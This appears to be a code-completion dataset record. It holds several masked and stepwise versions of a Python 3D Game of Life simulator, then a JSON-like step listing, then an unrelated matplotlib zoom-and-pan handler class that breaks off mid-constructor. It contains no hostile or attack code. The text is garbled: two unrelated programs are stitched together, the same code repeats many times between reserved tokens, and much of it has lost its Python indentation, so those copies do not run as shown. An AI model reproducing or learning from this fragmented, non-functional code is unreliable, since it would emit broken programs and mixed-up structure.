print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1] + 1):
s = ''
for i in range(ws[0][0], ws[1][0] + 1):
if self.is_active((i, j, k)):
s += '#'
else:
s += '.'
print(s)
print()
def parse_world(rows):
world = {}
k = 0
for j, r in enumerate(rows):
for i, c in enumerate(r):
if c == '#':
world[i, j, k] = '#'
return world
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def add_coord(c1, c2):
return c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2]
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)
), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
elif self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
for i in range(ws[0][0] - 1, ws[1][0] + 2):
for j in range(ws[0][1] - 1, ws[1][1] + 2):
for k in range(ws[0][2] - 1, ws[1][2] + 2):
self.get_next_square_state((i, j, k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2] + 1):
print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1] + 1):
s = ''
for i in range(ws[0][0], ws[1][0] + 1):
if self.is_active((i, j, k)):
s += '#'
else:
s += '.'
print(s)
print()
def parse_world(rows):
world = {}
k = 0
for j, r in enumerate(rows):
for i, c in enumerate(r):
if c == '#':
world[i, j, k] = '#'
return world
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
all_neighbors_coord = []
for i in range(-1, 2):
for j in range(-1, 2):
for k in range(-1, 2):
if i != 0 or j != 0 or k != 0:
all_neighbors_coord.append((i, j, k))
def add_coord(c1, c2):
return c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2]
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)
), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
elif self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
for i in range(ws[0][0] - 1, ws[1][0] + 2):
for j in range(ws[0][1] - 1, ws[1][1] + 2):
for k in range(ws[0][2] - 1, ws[1][2] + 2):
self.get_next_square_state((i, j, k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2] + 1):
print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1] + 1):
s = ''
for i in range(ws[0][0], ws[1][0] + 1):
if self.is_active((i, j, k)):
s += '#'
else:
s += '.'
print(s)
print()
def parse_world(rows):
world = {}
k = 0
for j, r in enumerate(rows):
for i, c in enumerate(r):
if c == '#':
world[i, j, k] = '#'
return world
inp = 'test.txt'
if len(sys.argv) == 2:
inp = sys.argv[1]
world = parse_world([r.strip() for r in open(inp, 'r').readlines()])
l = life(world)
l.print()
l.run(6)
print(l.count_active())
<|reserved_special_token_1|>
#!/usr/bin/env python3
import sys
all_neighbors_coord = []
for i in range(-1, 2):
for j in range(-1, 2):
for k in range(-1, 2):
if i != 0 or j != 0 or k != 0:
all_neighbors_coord.append((i, j, k))
def add_coord(c1, c2):
return (c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2])
class life:
def __init__(self, world):
self.world = world
def get_world_size(self):
xs = [c[0] for c in self.world]
ys = [c[1] for c in self.world]
zs = [c[2] for c in self.world]
return ((min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs)))
def is_active(self, coord):
return coord in self.world
def count_active_neighbors(self, coord):
return len(list(filter(lambda c: self.is_active(add_coord(coord, c)), all_neighbors_coord)))
def get_next_square_state(self, coord, next_world):
if self.is_active(coord):
if self.count_active_neighbors(coord) in [2, 3]:
next_world[coord] = '#'
else:
if self.count_active_neighbors(coord) == 3:
next_world[coord] = '#'
def step(self):
next_world = {}
ws = self.get_world_size()
for i in range(ws[0][0]-1,ws[1][0]+2):
for j in range(ws[0][1]-1,ws[1][1]+2):
for k in range(ws[0][2]-1,ws[1][2]+2):
self.get_next_square_state((i,j,k), next_world)
self.world = next_world
def run(self, steps):
for _i in range(0, steps):
self.step()
self.print()
def count_active(self):
return len(self.world)
def print(self):
ws = self.get_world_size()
for k in range(ws[0][2], ws[1][2]+1):
print('z={}'.format(k))
print()
for j in range(ws[0][1], ws[1][1]+1):
s = ''
for i in range(ws[0][0], ws[1][0]+1):
if self.is_active((i,j,k)):
s += '#'
else:
s += '.'
print(s)
print()
def parse_world(rows):
world = {}
k = 0
for j, r in enumerate(rows):
for i, c in enumerate(r):
if c == '#':
world[(i,j,k)] = '#'
return world
inp = 'test.txt'
if len(sys.argv) == 2:
inp = sys.argv[1]
world = parse_world([r.strip() for r in open(inp, 'r').readlines()])
l = life(world)
l.print()
l.run(6)
print(l.count_active())
|
flexible
|
{
"blob_id": "e7060658ae1838b0870b2a3adb61c9f8d78c93c7",
"index": 3245,
"step-1": "<mask token>\n\n\nclass life:\n\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)\n ), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n elif self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0] - 1, ws[1][0] + 2):\n for j in range(ws[0][1] - 1, ws[1][1] + 2):\n for k in range(ws[0][2] - 1, ws[1][2] + 2):\n self.get_next_square_state((i, j, k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2] + 1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1] + 1):\n s = ''\n for i in range(ws[0][0], ws[1][0] + 1):\n if self.is_active((i, j, k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass life:\n\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)\n ), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n elif self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0] - 1, ws[1][0] + 2):\n for j in range(ws[0][1] - 1, ws[1][1] + 2):\n for k in range(ws[0][2] - 1, ws[1][2] + 2):\n self.get_next_square_state((i, j, k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2] + 1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1] + 1):\n s = ''\n for i in range(ws[0][0], ws[1][0] + 1):\n if self.is_active((i, j, k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\n\ndef parse_world(rows):\n world = {}\n k = 0\n for j, r in enumerate(rows):\n for i, c in enumerate(r):\n if c == '#':\n world[i, j, k] = '#'\n return world\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef add_coord(c1, c2):\n return c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2]\n\n\nclass life:\n\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)\n ), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n elif self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0] - 1, ws[1][0] + 2):\n for j in range(ws[0][1] - 1, ws[1][1] + 2):\n for k in range(ws[0][2] - 1, ws[1][2] + 2):\n self.get_next_square_state((i, j, k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2] + 1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1] + 1):\n s = ''\n for i in range(ws[0][0], ws[1][0] + 1):\n if self.is_active((i, j, k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\n\ndef parse_world(rows):\n world = {}\n k = 0\n for j, r in enumerate(rows):\n for i, c in enumerate(r):\n if c == '#':\n world[i, j, k] = '#'\n return world\n\n\n<mask token>\n",
"step-4": "<mask token>\nall_neighbors_coord = []\nfor i in range(-1, 2):\n for j in range(-1, 2):\n for k in range(-1, 2):\n if i != 0 or j != 0 or k != 0:\n all_neighbors_coord.append((i, j, k))\n\n\ndef add_coord(c1, c2):\n return c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2]\n\n\nclass life:\n\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)\n ), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n elif self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0] - 1, ws[1][0] + 2):\n for j in range(ws[0][1] - 1, ws[1][1] + 2):\n for k in range(ws[0][2] - 1, ws[1][2] + 2):\n self.get_next_square_state((i, j, k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2] + 1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1] + 1):\n s = ''\n for i in range(ws[0][0], ws[1][0] + 1):\n if self.is_active((i, j, k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\n\ndef parse_world(rows):\n world = {}\n k = 0\n for j, r in enumerate(rows):\n for i, c in enumerate(r):\n if c == '#':\n world[i, j, k] = '#'\n return world\n\n\ninp = 'test.txt'\nif len(sys.argv) == 2:\n inp = sys.argv[1]\nworld = parse_world([r.strip() for r in open(inp, 'r').readlines()])\nl = life(world)\nl.print()\nl.run(6)\nprint(l.count_active())\n",
"step-5": "#!/usr/bin/env python3\n\nimport sys\n\nall_neighbors_coord = []\nfor i in range(-1, 2):\n for j in range(-1, 2):\n for k in range(-1, 2):\n if i != 0 or j != 0 or k != 0:\n all_neighbors_coord.append((i, j, k))\n\ndef add_coord(c1, c2):\n return (c1[0] + c2[0], c1[1] + c2[1], c1[2] + c2[2])\n\nclass life:\n def __init__(self, world):\n self.world = world\n\n def get_world_size(self):\n xs = [c[0] for c in self.world]\n ys = [c[1] for c in self.world]\n zs = [c[2] for c in self.world]\n return ((min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs)))\n\n def is_active(self, coord):\n return coord in self.world\n\n def count_active_neighbors(self, coord):\n return len(list(filter(lambda c: self.is_active(add_coord(coord, c)), all_neighbors_coord)))\n\n def get_next_square_state(self, coord, next_world):\n if self.is_active(coord):\n if self.count_active_neighbors(coord) in [2, 3]:\n next_world[coord] = '#'\n else:\n if self.count_active_neighbors(coord) == 3:\n next_world[coord] = '#'\n\n def step(self):\n next_world = {}\n ws = self.get_world_size()\n for i in range(ws[0][0]-1,ws[1][0]+2):\n for j in range(ws[0][1]-1,ws[1][1]+2):\n for k in range(ws[0][2]-1,ws[1][2]+2):\n self.get_next_square_state((i,j,k), next_world)\n self.world = next_world\n\n def run(self, steps):\n for _i in range(0, steps):\n self.step()\n self.print()\n\n def count_active(self):\n return len(self.world)\n\n def print(self):\n ws = self.get_world_size()\n for k in range(ws[0][2], ws[1][2]+1):\n print('z={}'.format(k))\n print()\n for j in range(ws[0][1], ws[1][1]+1):\n s = ''\n for i in range(ws[0][0], ws[1][0]+1):\n if self.is_active((i,j,k)):\n s += '#'\n else:\n s += '.'\n print(s)\n print()\n\ndef parse_world(rows):\n world = {}\n k = 0\n for j, r in enumerate(rows):\n for i, c in enumerate(r):\n if c == '#':\n world[(i,j,k)] = '#'\n return world\n\ninp = 'test.txt'\nif len(sys.argv) == 2:\n inp = sys.argv[1]\n\nworld = parse_world([r.strip() for r in open(inp, 'r').readlines()])\n\nl = life(world)\nl.print()\nl.run(6)\nprint(l.count_active())\n",
"step-ids": [
10,
11,
12,
14,
16
]
}
|
[
10,
11,
12,
14,
16
] |
<|reserved_special_token_0|>
class ZoomPanHandler:
<|reserved_special_token_0|>
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
Applies the zoom and pan transforms to the axes. Useful after reseting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up':
xlim = [xdata - xmin / self.scale_factor, xdata + xmax /
self.scale_factor]
ylim = [ydata - ymin / self.scale_factor, ydata + ymax /
self.scale_factor]
elif event.button == 'down':
xlim = [xdata - xmin * self.scale_factor, xdata + xmax *
self.scale_factor]
ylim = [ydata - ymin * self.scale_factor, ydata + ymax *
self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = event.xdata, event.ydata
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
xlim = self.axes.get_xlim()
ylim = self.axes.get_ylim()
xlim -= event.xdata - self._press_coords[0]
ylim -= event.ydata - self._press_coords[1]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
<|reserved_special_token_0|>
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ZoomPanHandler:
<|reserved_special_token_0|>
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
Applies the zoom and pan transforms to the axes. Useful after reseting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up':
xlim = [xdata - xmin / self.scale_factor, xdata + xmax /
self.scale_factor]
ylim = [ydata - ymin / self.scale_factor, ydata + ymax /
self.scale_factor]
elif event.button == 'down':
xlim = [xdata - xmin * self.scale_factor, xdata + xmax *
self.scale_factor]
ylim = [ydata - ymin * self.scale_factor, ydata + ymax *
self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = event.xdata, event.ydata
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
xlim = self.axes.get_xlim()
ylim = self.axes.get_ylim()
xlim -= event.xdata - self._press_coords[0]
ylim -= event.ydata - self._press_coords[1]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _connect_cb(self):
fig = self.axes.figure
self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',
self._cb_mouse_wheel)
self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',
self._cb_mouse_button)
self._cb_mouse_release_id = fig.canvas.mpl_connect(
'button_release_event', self._cb_mouse_release)
self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'
, self._cb_mouse_motion)
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ZoomPanHandler:
"""
Matplotlib callback class to handle pan and zoom events.
"""
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
Applies the zoom and pan transforms to the axes. Useful after reseting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up':
xlim = [xdata - xmin / self.scale_factor, xdata + xmax /
self.scale_factor]
ylim = [ydata - ymin / self.scale_factor, ydata + ymax /
self.scale_factor]
elif event.button == 'down':
xlim = [xdata - xmin * self.scale_factor, xdata + xmax *
self.scale_factor]
ylim = [ydata - ymin * self.scale_factor, ydata + ymax *
self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = event.xdata, event.ydata
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
xlim = self.axes.get_xlim()
ylim = self.axes.get_ylim()
xlim -= event.xdata - self._press_coords[0]
ylim -= event.ydata - self._press_coords[1]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _connect_cb(self):
fig = self.axes.figure
self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',
self._cb_mouse_wheel)
self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',
self._cb_mouse_button)
self._cb_mouse_release_id = fig.canvas.mpl_connect(
'button_release_event', self._cb_mouse_release)
self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'
, self._cb_mouse_motion)
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ZoomPanHandler:
"""
Matplotlib callback class to handle pan and zoom events.
"""
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
Applies the zoom and pan transforms to the axes. Useful after reseting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up':
xlim = [xdata - xmin / self.scale_factor, xdata + xmax /
self.scale_factor]
ylim = [ydata - ymin / self.scale_factor, ydata + ymax /
self.scale_factor]
elif event.button == 'down':
xlim = [xdata - xmin * self.scale_factor, xdata + xmax *
self.scale_factor]
ylim = [ydata - ymin * self.scale_factor, ydata + ymax *
self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = event.xdata, event.ydata
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
xlim = self.axes.get_xlim()
ylim = self.axes.get_ylim()
xlim -= event.xdata - self._press_coords[0]
ylim -= event.ydata - self._press_coords[1]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _connect_cb(self):
fig = self.axes.figure
self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',
self._cb_mouse_wheel)
self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',
self._cb_mouse_button)
self._cb_mouse_release_id = fig.canvas.mpl_connect(
'button_release_event', self._cb_mouse_release)
self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'
, self._cb_mouse_motion)
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
def main():
import matplotlib.pyplot as plt
fig = plt.figure()
axes = fig.add_subplot(111)
axes.scatter(x=np.arange(0, 10, 0.5), y=np.arange(0, 20, 1), color='r',
marker='o')
hand = ZoomPanHandler(axes, scale_factor=1.5)
plt.show()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
class ZoomPanHandler:
"""
Matplotlib callback class to handle pan and zoom events.
"""
def __init__(self, axes, scale_factor=2, mouse_button=2):
"""
Default constructor for the ZoomPanHandler class.
Parameters
axes: matplotlib.backend_bases.Axes
The axes to attach this handler to.
scale_factor: number
The scale factor to apply when zooming.
mouse_button: number or string
The mouse button used to activate the pan action. Default value is
2, meaning the middle mouse button.
"""
self._axes = axes
self._scale_factor = scale_factor
self._mouse_button = mouse_button
self._press_coords = None
self._curr_xlim = self.axes.get_xlim()
